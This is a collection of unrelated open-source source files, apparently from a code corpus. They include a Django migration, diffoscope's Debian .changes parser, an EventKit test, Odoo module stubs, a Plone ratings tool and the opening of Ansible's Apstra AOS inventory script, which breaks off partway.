from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('snippets', '0011_auto_20170917_2103'),
]
operations = [
migrations.AlterField(
model_name='actionlevel',
name='aquatic_ecotoxicity',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='direct_exposure',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='dw_toxicity',
field=models.FloatField(blank=True, null=True, verbose_name='Drinking Water Toxicity'),
),
migrations.AlterField(
model_name='actionlevel',
name='gw_gross_contamination',
field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Gross Contamination'),
),
migrations.AlterField(
model_name='actionlevel',
name='gw_vapor_emissions',
field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Vapor Emissions'),
),
migrations.AlterField(
model_name='actionlevel',
name='indoor_air',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='leaching',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='shallow_soil_vapor',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='soil_gross_contamination',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='soil_vapor_emissions',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='actionlevel',
name='terrestrial_ecotoxicity',
field=models.FloatField(blank=True, null=True),
),
]
| mit |
anthraxx/diffoscope | diffoscope/changes.py | 2 | 11351 | # -*- coding: utf-8 -*-
#
# changes.py — .changes file handling class
#
# This file was originally part of debexpo
# https://alioth.debian.org/projects/debexpo/
#
# Copyright © 2008 Jonny Lamb <[email protected]>
# Copyright © 2010 Jan Dittberner <[email protected]>
# Copyright © 2012 Arno Töll <[email protected]>
# Copyright © 2012 Paul Tagliamonte <[email protected]>
# Copyright © 2014 Jérémy Bobbio <[email protected]>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
This code deals with the reading and processing of Debian .changes files. This
code is copyright (c) Jonny Lamb, and is used by dput, rather then created as
a result of it. Thank you Jonny.
"""
__author__ = 'Jonny Lamb'
__copyright__ = 'Copyright © 2008 Jonny Lamb, Copyright © 2010 Jan Dittberner'
__license__ = 'MIT'
import os.path
import hashlib
import logging
import subprocess
from debian import deb822
from .tools import tool_required
logger = logging.getLogger(__name__)
class ChangesFileException(Exception):
pass
class Changes(object):
"""
Changes object to help process and store information regarding Debian
.changes files, used in the upload process.
"""
def __init__(self, filename=None, string=None):
"""
Object constructor. The object allows the user to specify **either**:
#. a path to a *changes* file to parse
#. a string with the *changes* file contents.
::
a = Changes(filename='/tmp/packagename_version.changes')
b = Changes(string='Source: packagename\\nMaintainer: ...')
``filename``
Path to *changes* file to parse.
``string``
*changes* file in a string to parse.
"""
if (filename and string) or (not filename and not string):
raise TypeError
if filename:
self._absfile = os.path.abspath(filename)
self._directory = os.path.dirname(self._absfile)
self._data = deb822.Changes(open(filename, encoding='utf-8'))
self.basename = os.path.basename(filename)
else:
self._data = deb822.Changes(string)
if len(self._data) == 0:
raise ChangesFileException('Changes file could not be parsed.')
def get_filename(self):
"""
Returns the filename from which the changes file was generated from.
Please do note this is just the basename, not the entire full path, or
even a relative path. For the absolute path to the changes file, please
see :meth:`get_changes_file`.
"""
return self.basename
def get_changes_file(self):
"""
Return the full, absolute path to the changes file. For just the
filename, please see :meth:`get_filename`.
"""
return os.path.join(self._directory, self.get_filename())
def get_path(self, filename):
"""
Return the full, absolute path to a file referenced by the changes
file.
"""
return os.path.join(self._directory, filename)
def get_files(self):
"""
Returns a list of files referenced in the changes file, such as
the .dsc, .deb(s), .orig.tar.gz, and .diff.gz or .debian.tar.gz.
All strings in the array will be absolute paths to the files.
"""
return [os.path.join(self._directory, z['name'])
for z in self._data['Files']]
def keys(self):
return self._data.keys()
def __getitem__(self, key):
"""
Returns the value of the rfc822 key specified.
``key``
Key of data to request.
"""
return self._data[key]
def __contains__(self, key):
"""
Returns whether the specified RFC822 key exists.
``key``
Key of data to check for existence.
"""
return key in self._data
def get(self, key, default=None):
"""
Returns the value of the rfc822 key specified, but defaults
to a specific value if not found in the rfc822 file.
``key``
Key of data to request.
``default``
Default return value if ``key`` does not exist.
"""
return self._data.get(key, default)
def get_as_string(self, key):
"""
Returns the value of the rfc822 key specified as the original string.
``key``
Key of data to request.
"""
return self._data.get_as_string(key)
def get_component(self):
"""
Returns the component of the package.
"""
return self._parse_section(self._data['Files'][0]['section'])[0]
def get_priority(self):
"""
Returns the priority of the package.
"""
return self._parse_section(self._data['Files'][0]['priority'])[1]
def get_section(self):
"""
Returns the section of the package.
"""
return self._parse_section(self._data['Files'][0]['section'])[1]
def get_dsc(self):
"""
Returns the name of the .dsc file.
"""
for item in self.get_files():
if item.endswith('.dsc'):
return item
def get_pool_path(self):
"""
Returns the path the changes file would be
"""
return self._data.get_pool_path()
def get_package_name(self):
"""
Returns the source package name
"""
return self.get("Source")
def _parse_section(self, section):
"""
Works out the component and section from the "Section" field.
Sections like `python` or `libdevel` are in main.
Sections with a prefix, separated with a forward-slash also show the
component.
It returns a list of strings in the form [component, section].
For example, `non-free/python` has component `non-free` and section
`python`.
``section``
Section name to parse.
"""
if '/' in section:
return section.split('/')
else:
return ['main', section]
def set_directory(self, directory):
if directory:
self._directory = directory
else:
self._directory = ""
def validate(self, check_hash="sha1", check_signature=True):
"""
See :meth:`validate_checksums` for ``check_hash``, and
:meth:`validate_signature` if ``check_signature`` is True.
"""
self.validate_checksums(check_hash)
if check_signature:
self.validate_signature(check_signature)
else:
logger.info("Not checking signature")
@tool_required('gpg')
def validate_signature(self, check_signature=True):
"""
Validate the GPG signature of a .changes file.
Throws a :class:`dput.exceptions.ChangesFileException` if there's
an issue with the GPG signature. Returns the GPG key ID.
"""
pipe = subprocess.Popen(
["gpg", "--status-fd", "1", "--verify", "--batch",
self.get_changes_file()],
shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
gpg_output, gpg_output_stderr = pipe.communicate()
print(gpg_output)
if pipe.returncode != 0:
raise ChangesFileException(
"Unknown problem while verifying signature")
# contains verbose human readable GPG information
gpg_output_stderr = str(gpg_output_stderr, encoding='utf8')
print(gpg_output_stderr)
gpg_output = gpg_output.decode(encoding='UTF-8')
if gpg_output.count('[GNUPG:] GOODSIG'):
pass
elif gpg_output.count('[GNUPG:] BADSIG'):
raise ChangesFileException("Bad signature")
elif gpg_output.count('[GNUPG:] ERRSIG'):
raise ChangesFileException("Error verifying signature")
elif gpg_output.count('[GNUPG:] NODATA'):
raise ChangesFileException("No signature on")
else:
raise ChangesFileException(
"Unknown problem while verifying signature"
)
key = None
for line in gpg_output.split("\n"):
if line.startswith('[GNUPG:] VALIDSIG'):
key = line.split()[2]
return key
def validate_checksums(self, check_hash="sha1"):
"""
Validate checksums for a package, using ``check_hack``'s type
to validate the package.
Valid ``check_hash`` types:
* sha1
* sha256
* md5
* md5sum
"""
logger.debug("validating %s checksums", check_hash)
for filename in self.get_files():
if check_hash == "sha1":
hash_type = hashlib.sha1()
checksums = self.get("Checksums-Sha1")
field_name = "sha1"
elif check_hash == "sha256":
hash_type = hashlib.sha256()
checksums = self.get("Checksums-Sha256")
field_name = "sha256"
elif check_hash == "md5":
hash_type = hashlib.md5()
checksums = self.get("Files")
field_name = "md5sum"
changed_files = None # appease pylint
for changed_files in checksums:
if changed_files['name'] == os.path.basename(filename):
break
else:
assert(
"get_files() returns different files than Files: knows?!")
with open(os.path.join(self._directory, filename), "rb") as fc:
while True:
chunk = fc.read(131072)
if not chunk:
break
hash_type.update(chunk)
fc.close()
if not hash_type.hexdigest() == changed_files[field_name]:
raise ChangesFileException(
"Checksum mismatch for file %s: %s != %s" % (
filename,
hash_type.hexdigest(),
changed_files[field_name]
))
else:
logger.debug("%s Checksum for file %s matches",
field_name, filename)
| gpl-3.0 |
venicegeo/eventkit-cloud | eventkit_cloud/utils/tests/test_coordinate_converter.py | 1 | 2036 | import json
import logging
import requests_mock
from django.conf import settings
from django.test import TestCase, override_settings
from eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter
logger = logging.getLogger(__name__)
mockURL = "http://test.test"
@override_settings(GEOCODING_AUTH_URL=None)
class TestConvert(TestCase):
def setUp(self):
self.mock_requests = requests_mock.Mocker()
self.mock_requests.start()
self.addCleanup(self.mock_requests.stop)
settings.CONVERT_API_URL = mockURL
def test_convert_success(self):
convert_response_success = {
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-112.61869345019069,
50.00105275281522
]
},
"properties": {
"name": "12UUA8440",
"from": "mgrs",
"to": "decdeg"
}
}
self.mock_requests.get(mockURL, text=json.dumps(convert_response_success), status_code=200)
convert = CoordinateConverter()
result = convert.get("18S TJ 97100 03003")
self.assertIsNotNone(result.get("geometry"))
self.assertEqual(result.get("type"), "Feature")
properties = result.get("properties")
geometry = result.get("geometry")
self.assertIsInstance(properties, dict)
self.assertIsInstance(geometry, dict)
self.assertEqual(geometry.get("type"), "Point")
self.assertIsInstance(geometry.get("coordinates"), list)
def test_convert_fail(self):
convert_response_fail = {
"properties": {
"name": "12UUA844",
"from": "mgrs",
"to": "decdeg"
}
}
with self.assertRaises(Exception):
self.mock_requests.get(mockURL, text=json.dumps(convert_response_fail), status_code=500)
CoordinateConverter().get_data()
| bsd-3-clause |
wangjun/odoo | addons/l10n_de/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
tinkerthaler/odoo | addons/resource/__init__.py | 448 | 1086 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import resource
import faces
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Cenditel/cenditel.comunidades.cynin | products/ATRatings/RatingsTool.py | 4 | 13993 | import os, sys
import urllib
import Globals
from AccessControl import ClassSecurityInfo
from DateTime import DateTime
from OFS.SimpleItem import SimpleItem
from Acquisition import aq_base
from Products.Archetypes.Referenceable import Referenceable
from OFS.PropertyManager import PropertyManager
from Products.CMFCore.utils import UniqueObject, getToolByName
from Products.CMFPlone.PloneBaseTool import PloneBaseTool
from Products.PageTemplates.PageTemplateFile import PageTemplateFile
# lazy way of configuring this tool
from config import MIN_RATING_VALUE, MAX_RATING_VALUE, STORAGE_CLASS, STORAGE_ARGS, NEUTRAL_RATING_VALUE
from Permissions import ADD_RATING_PERMISSION
from Products.CMFCore.permissions import ManagePortal
from ZODBStorage import HITS_SUMMARY_ID, RATINGS_SUMMARY_ID
# ##############################################################################
class RatingsTool(PloneBaseTool, UniqueObject, SimpleItem, Referenceable, PropertyManager):
""" """
id = 'portal_ratings'
meta_type= 'Ratings Tool'
# toolicon = 'skins/plone_images/favorite_icon.gif'
security = ClassSecurityInfo()
isPrincipiaFolderish = 0
storage = None
__implements__ = (PloneBaseTool.__implements__, SimpleItem.__implements__, )
manage_options = ( ({'label':'Overview', 'action':'manage_overview'},) +
PropertyManager.manage_options + SimpleItem.manage_options)
security.declareProtected(ManagePortal, 'manage_overview')
manage_overview = PageTemplateFile('www/portal_ratings_manage_overview', globals())
manage_overview.__name__ = 'manage_overview'
manage_overview._need__name__ = 0
manage_main = manage_overview
_properties = PropertyManager._properties + (
{'id':'allowed_rating_types', 'type': 'lines', 'mode':'w',
'label':'Allowed raing types'},
{'id':'allowed_counting_types', 'type': 'lines', 'mode':'w',
'label':'Allowed hit counting types'},
)
allowed_rating_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]
allowed_counting_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]
def isRatingAllowedFor(self, content):
""" do content allow rating?
Add a 'allowRatings' boolean property to the context to enable it"""
allowRatings = getattr(content, 'enableRatings', 1)
if not allowRatings:
return 0
if content.getPortalTypeName() not in self.allowed_rating_types:
return 0
return hasattr(aq_base(content), 'UID')
def isCountingAllowedFor(self, content):
""" do the content allow hit count
Add a 'allowCountings' boolean property to the context to enable it"""
allowCountings = getattr(content, 'enableCountings', 0)
if not allowCountings:
return 0
if content.getPortalTypeName() not in self.allowed_counting_types:
return 0
return hasattr(aq_base(content), 'UID')
security.declarePublic('getCyninRating')
def getCyninRating(self,uid):
cyninrating = self._getCyninRating(uid)
if cyninrating is None:
return None
else:
return cyninrating
security.declarePublic('getCyninRatingCount')
def getCyninRatingCount(self,uid):
return self._getCyninRatingCount(uid)
security.declarePublic('getTopRatingsAll')
def getTopRatingsAll(self,brains):
""" get top n hot contents from catalog brains """
results = []
for brain in brains:
value = self._getCyninRating(brain.UID)
if value <> None:
ratecount = self.getRatingCount(brain.UID)
cyninratingcount = self._getCyninRatingCount(brain.UID)
results.append( (value, brain, ratecount, cyninratingcount))
def sortlist(x,y):
if cmp(y[0],x[0]) != 0:
return cmp(y[0],x[0])
else:
return cmp(y[2],x[2])
results.sort(lambda x,y:sortlist(x,y));
return results
security.declarePublic('getTopRatings')
def getTopRatings(self, brains, limit=5):
""" get top n hot contents from catalog brains """
results = []
results = self.getTopRatingsAll(brains)
return results[:limit]
security.declarePublic('getBadRatings')
def getBadRatings(self, brains, limit=5):
""" get bad ratings from catalog brains """
results = []
for brain in brains:
value = self.getRatingMean(brain.UID)
if value:
results.append((value, brain))
results.sort(lambda x,y:cmp(x[0], y[0]))
return results[:limit]
security.declarePublic('getTopCountings')
def getTopCountings(self, brains, limit=5):
""" get top n hot contents from catalog brains """
results = []
for brain in brains:
count = self.getHitCount(brain.UID)
if count:
results.append((count, brain))
results.sort(lambda x,y:cmp(y[0], x[0]))
return results[:limit]
security.declarePublic('getBadCountings')
def getBadCountings(self, brains, limit=5):
""" get top n cold contents from catalog brains """
results = []
for brain in brains:
count = self.getHitCount(brain.UID)
if count:
results.append((count, brain))
results.sort(lambda x,y:cmp(x[0], y[0]))
return results[:limit]
def addRating(self, rating, uid):
mt = getToolByName(self, 'portal_membership')
if mt.isAnonymousUser():
raise ValueError, 'Anonymous user cannot rate content'
# check permission
reference_catalog = getToolByName(self, 'reference_catalog')
object = reference_catalog.lookupObject(uid)
mt.checkPermission(ADD_RATING_PERMISSION, object)
member = mt.getAuthenticatedMember()
username = member.getUserName()
old_rating = self._getUserRating(uid, username)
if old_rating is not None:
self._deleteRating(uid, username)
return self._addRating(rating, uid, username)
def getUserRating(self, uid, username=None):
if username is None:
mt = getToolByName(self, 'portal_membership')
if mt.isAnonymousUser():
raise ValueError, 'Anonymous user cannot rate content'
member = mt.getAuthenticatedMember()
username = member.getUserName()
return self._getUserRating(uid, username)
def addHit(self, uid):
self._getStorage().addHit(uid)
# Summary statistics: HITS
# hits for individual item
def getHitCount(self, uid):
return self._getStorage().getHitCount(uid) or 0
# hits for all items
def getTotalHitCount(self):
return self._getHitsSummary().getCount()
def getHitRateTimeInterval(self):
return HIT_RATE_TIME_INTERVAL
def getHitRate(self, uid):
return self._getStorage().getHitRate(uid)
# Summary statistics: RATINGS
def getMinRating(self):
return MIN_RATING_VALUE
def getMaxRating(self):
return MAX_RATING_VALUE
# rating stats for individual items
def getRatingCount(self, uid):
return self._getStorage().getRatingCount(uid)
def getRatingSum(self, uid):
return self._getStorage().getSum(uid)
def getRatingSumSquared(self, uid):
return self._getStorage().getSumSquared(uid)
def getRatingMean(self, uid):
ratingMean = self._getStorage().getMean(uid)
if ratingMean == None:
return 0
else:
return ratingMean
def getRatingStdDev(self, uid):
return self._getStorage().getStdDev(uid)
def getRatingVariance(self, uid):
return self._getStorage().getVariance(uid)
# rating stats for all items
def getTotalRatingCount(self):
"""a count of rating means."""
return self._getStorage().getTotalRatingCount()
def getRatingMeanCount(self):
"""a count of rating means."""
return self._getStorage().getRatingMeanCount()
def getRatingMeanSum(self):
"""return a sum of rating means."""
return self._getStorage().getRatingMeanSum()
def getRatingMeanSumSquared(self):
"""a sum of rating means squared."""
return self._getStorage().getRatingMeanSumSquared()
def getRatingMeanMean(self):
"""a mean of rating means."""
return self._getStorage().getRatingMeanMean()
def getRatingMeanStdDev(self):
"""a standard deviation of rating means."""
return self._getStorage().getRatingMeanStdDev()
def getRatingMeanVariance(self):
"""a standard deviation of rating means"""
return self._getStorage().getRatingMeanVariance()
def getNoiseVariance(self):
return self._getStorage().getNoiseVariance()
def getEstimatedRating(self, uid):
"""Use a Bayesian MMSE estimator for DC in white Gaussian noise to
estimate the true rating for an item.
Motivation: a small number of very positive or very negative ratings
can make an item look much better or worse than it actually is. We
use a statistical technique to reduce this kind of small number bias.
Essentially we assume that true ratings have a Gaussian distribution.
Most true ratings are somewhere in the middle, with small numbers
very high and small numbers very low. User ratings for an item are
the item's true rating + some Gaussian noise. User ratings are
mostly close to the true rating, with a few much higher and a few
much lower.
We estimate a prior distribution of true means and the noise level
from all the data. We then use this prior info for the Bayesian
estimator. See _Fundamentals of Statistical Signal Processing_, by
Alan Kay, pp. 316 - 321 for details.
"""
priorMean = self.getRatingMeanMean()
noiseVariance = self.getNoiseVariance()
itemMean = self.getRatingMean(uid)
if priorMean is None or noiseVariance is None:
# not enough information to compute a prior -- just return the mean
if itemMean is None:
# no data for computing a mean -- return the middle rating
return 0.5 * (float(self.getMinRating()) + float(self.getMaxRating()))
return itemMean
if itemMean is None:
return priorMean
priorVariance = self.getRatingMeanVariance()
if priorVariance == 0.0 and noiseVariance == 0.0:
return itemMean
itemRatings = self.getRatingCount(uid)
alpha = priorVariance / (priorVariance + noiseVariance/itemRatings)
return alpha * itemMean + (1.0 - alpha) * priorMean
# private interface
def _getStorage(self):
if self.storage is None:
self.storage = STORAGE_CLASS(**STORAGE_ARGS)
return self.storage
def _addRating(self, rating, uid, username):
# delegate to storage
self._getStorage().addRating(rating, uid, username)
def _deleteRating(self, uid, username):
# delegate to storage
self._getStorage().deleteRating(uid, username)
def _getUserRating(self, uid, username):
# delegate to storage
return self._getStorage().getUserRating(uid, username)
def _deleteRatingsFor(self, uid):
# delegate to storage
return self._getStorage().deleteRatingsFor(uid)
def _getCyninRating(self,uid):
returnvalue = None
objRating = self._getStorage()._getObjectRatings(uid,0)
if objRating:
repository = objRating.repository
keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]
if len(keyslist) == 0:
returnvalue = None
else:
returnvalue = 0
for eachkey in keyslist:
value = repository.get(eachkey,None)
if value and isinstance(value,int):
if value == NEUTRAL_RATING_VALUE:
self._deleteRating(uid,eachkey)
else:
returnvalue = returnvalue + (value - NEUTRAL_RATING_VALUE)
return returnvalue
def _getCyninRatingCount(self,uid):
result = {'positive':0,'negative':0,'positivescore':0,'negativescore':0}
objRating = self._getStorage()._getObjectRatings(uid,0)
if objRating:
repository = objRating.repository
keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]
for eachkey in keyslist:
value = repository.get(eachkey,None)
if value and isinstance(value,int):
if value > NEUTRAL_RATING_VALUE:
result['positive'] = result['positive'] + 1
result['positivescore'] = result['positivescore'] + (value - NEUTRAL_RATING_VALUE)
elif value < NEUTRAL_RATING_VALUE:
result['negative'] = result['negative'] + 1
result['negativescore'] = result['negativescore'] + (value - NEUTRAL_RATING_VALUE)
return result
Globals.InitializeClass(RatingsTool)
| gpl-3.0 |
pchauncey/ansible | contrib/inventory/apstra_aos.py | 14 | 20398 | #!/usr/bin/env python
#
# (c) 2017 Apstra Inc, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
Apstra AOS external inventory script
====================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this:
- copy this file over /etc/ansible/hosts and chmod +x the file.
- Copy both files (.py and .ini) in your preferred directory
More information about Ansible Dynamic Inventory here
http://unix.stackexchange.com/questions/205479/in-ansible-dynamic-inventory-json-can-i-render-hostvars-based-on-the-hostname
2 modes are currently, supported: **device based** or **blueprint based**:
- For **Device based**, the list of device is taken from the global device list
the serial ID will be used as the inventory_hostname
- For **Blueprint based**, the list of device is taken from the given blueprint
the Node name will be used as the inventory_hostname
Input parameters parameter can be provided using either with the ini file or by using Environment Variables:
The following list of Environment Variables are supported: AOS_SERVER, AOS_PORT, AOS_USERNAME, AOS_PASSWORD, AOS_BLUEPRINT
The config file takes precedence over the Environment Variables
Tested with Apstra AOS 1.1
This script has been inspired by the cobbler.py inventory. thanks
Author: Damien Garros (@dgarros)
Version: 0.2.0
"""
import json
import os
import re
import sys
try:
import argparse
HAS_ARGPARSE = True
except ImportError:
HAS_ARGPARSE = False
try:
from apstra.aosom.session import Session
HAS_AOS_PYEZ = True
except ImportError:
HAS_AOS_PYEZ = False
from ansible.module_utils.six.moves import configparser
"""
##
Expected output format in Device mode
{
"Cumulus": {
"hosts": [
"52540073956E",
"52540022211A"
],
"vars": {}
},
"EOS": {
"hosts": [
"5254001CAFD8",
"525400DDDF72"
],
"vars": {}
},
"Generic Model": {
"hosts": [
"525400E5486D"
],
"vars": {}
},
"Ubuntu GNU/Linux": {
"hosts": [
"525400E5486D"
],
"vars": {}
},
"VX": {
"hosts": [
"52540073956E",
"52540022211A"
],
"vars": {}
},
"_meta": {
"hostvars": {
"5254001CAFD8": {
"agent_start_time": "2017-02-03T00:49:16.000000Z",
"ansible_ssh_host": "172.20.52.6",
"aos_hcl_model": "Arista_vEOS",
"aos_server": "",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:47:58.454480Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "vEOS",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "Management1",
"mgmt_ipaddr": "172.20.52.6",
"mgmt_macaddr": "52:54:00:1C:AF:D8",
"os_arch": "x86_64",
"os_family": "EOS",
"os_version": "4.16.6M",
"os_version_info": {
"build": "6M",
"major": "4",
"minor": "16"
},
"serial_number": "5254001CAFD8",
"state": "OOS-QUARANTINED",
"vendor": "Arista"
},
"52540022211A": {
"agent_start_time": "2017-02-03T00:45:22.000000Z",
"ansible_ssh_host": "172.20.52.7",
"aos_hcl_model": "Cumulus_VX",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:45:11.019189Z",
"domain_name": "",
"error_message": "",
"fqdn": "cumulus",
"hostname": "cumulus",
"hw_model": "VX",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.7",
"mgmt_macaddr": "52:54:00:22:21:1a",
"os_arch": "x86_64",
"os_family": "Cumulus",
"os_version": "3.1.1",
"os_version_info": {
"build": "1",
"major": "3",
"minor": "1"
},
"serial_number": "52540022211A",
"state": "OOS-QUARANTINED",
"vendor": "Cumulus"
},
"52540073956E": {
"agent_start_time": "2017-02-03T00:45:19.000000Z",
"ansible_ssh_host": "172.20.52.8",
"aos_hcl_model": "Cumulus_VX",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:45:11.030113Z",
"domain_name": "",
"error_message": "",
"fqdn": "cumulus",
"hostname": "cumulus",
"hw_model": "VX",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.8",
"mgmt_macaddr": "52:54:00:73:95:6e",
"os_arch": "x86_64",
"os_family": "Cumulus",
"os_version": "3.1.1",
"os_version_info": {
"build": "1",
"major": "3",
"minor": "1"
},
"serial_number": "52540073956E",
"state": "OOS-QUARANTINED",
"vendor": "Cumulus"
},
"525400DDDF72": {
"agent_start_time": "2017-02-03T00:49:07.000000Z",
"ansible_ssh_host": "172.20.52.5",
"aos_hcl_model": "Arista_vEOS",
"aos_server": "",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-03T00:47:46.929921Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "vEOS",
"hw_version": "",
"is_acknowledged": false,
"mgmt_ifname": "Management1",
"mgmt_ipaddr": "172.20.52.5",
"mgmt_macaddr": "52:54:00:DD:DF:72",
"os_arch": "x86_64",
"os_family": "EOS",
"os_version": "4.16.6M",
"os_version_info": {
"build": "6M",
"major": "4",
"minor": "16"
},
"serial_number": "525400DDDF72",
"state": "OOS-QUARANTINED",
"vendor": "Arista"
},
"525400E5486D": {
"agent_start_time": "2017-02-02T18:44:42.000000Z",
"ansible_ssh_host": "172.20.52.4",
"aos_hcl_model": "Generic_Server_1RU_1x10G",
"aos_server": "172.20.52.3",
"aos_version": "AOS_1.1.1_OB.5",
"comm_state": "on",
"device_start_time": "2017-02-02T21:11:25.188734Z",
"domain_name": "",
"error_message": "",
"fqdn": "localhost",
"hostname": "localhost",
"hw_model": "Generic Model",
"hw_version": "pc-i440fx-trusty",
"is_acknowledged": false,
"mgmt_ifname": "eth0",
"mgmt_ipaddr": "172.20.52.4",
"mgmt_macaddr": "52:54:00:e5:48:6d",
"os_arch": "x86_64",
"os_family": "Ubuntu GNU/Linux",
"os_version": "14.04 LTS",
"os_version_info": {
"build": "",
"major": "14",
"minor": "04"
},
"serial_number": "525400E5486D",
"state": "OOS-QUARANTINED",
"vendor": "Generic Manufacturer"
}
}
},
"all": {
"hosts": [
"5254001CAFD8",
"52540073956E",
"525400DDDF72",
"525400E5486D",
"52540022211A"
],
"vars": {}
},
"vEOS": {
"hosts": [
"5254001CAFD8",
"525400DDDF72"
],
"vars": {}
}
}
"""
def fail(msg):
sys.stderr.write("%s\n" % msg)
sys.exit(1)
class AosInventory(object):
def __init__(self):
""" Main execution path """
if not HAS_AOS_PYEZ:
raise Exception('aos-pyez is not installed. Please see details here: https://github.com/Apstra/aos-pyez')
if not HAS_ARGPARSE:
raise Exception('argparse is not installed. Please install the argparse library or upgrade to python-2.7')
# Initialize inventory
self.inventory = dict() # A list of groups and the hosts in that group
self.inventory['_meta'] = dict()
self.inventory['_meta']['hostvars'] = dict()
# Read settings and parse CLI arguments
self.read_settings()
self.parse_cli_args()
# ----------------------------------------------------
# Open session to AOS
# ----------------------------------------------------
aos = Session(server=self.aos_server,
port=self.aos_server_port,
user=self.aos_username,
passwd=self.aos_password)
aos.login()
# Save session information in variables of group all
self.add_var_to_group('all', 'aos_session', aos.session)
# Add the AOS server itself in the inventory
self.add_host_to_group("all", 'aos')
self.add_var_to_host("aos", "ansible_ssh_host", self.aos_server)
self.add_var_to_host("aos", "ansible_ssh_pass", self.aos_password)
self.add_var_to_host("aos", "ansible_ssh_user", self.aos_username)
# ----------------------------------------------------
# Build the inventory
# 2 modes are supported: device based or blueprint based
# - For device based, the list of device is taken from the global device list
# the serial ID will be used as the inventory_hostname
# - For Blueprint based, the list of device is taken from the given blueprint
# the Node name will be used as the inventory_hostname
# ----------------------------------------------------
if self.aos_blueprint:
bp = aos.Blueprints[self.aos_blueprint]
if bp.exists is False:
fail("Unable to find the Blueprint: %s" % self.aos_blueprint)
for dev_name, dev_id in bp.params['devices'].value.items():
self.add_host_to_group('all', dev_name)
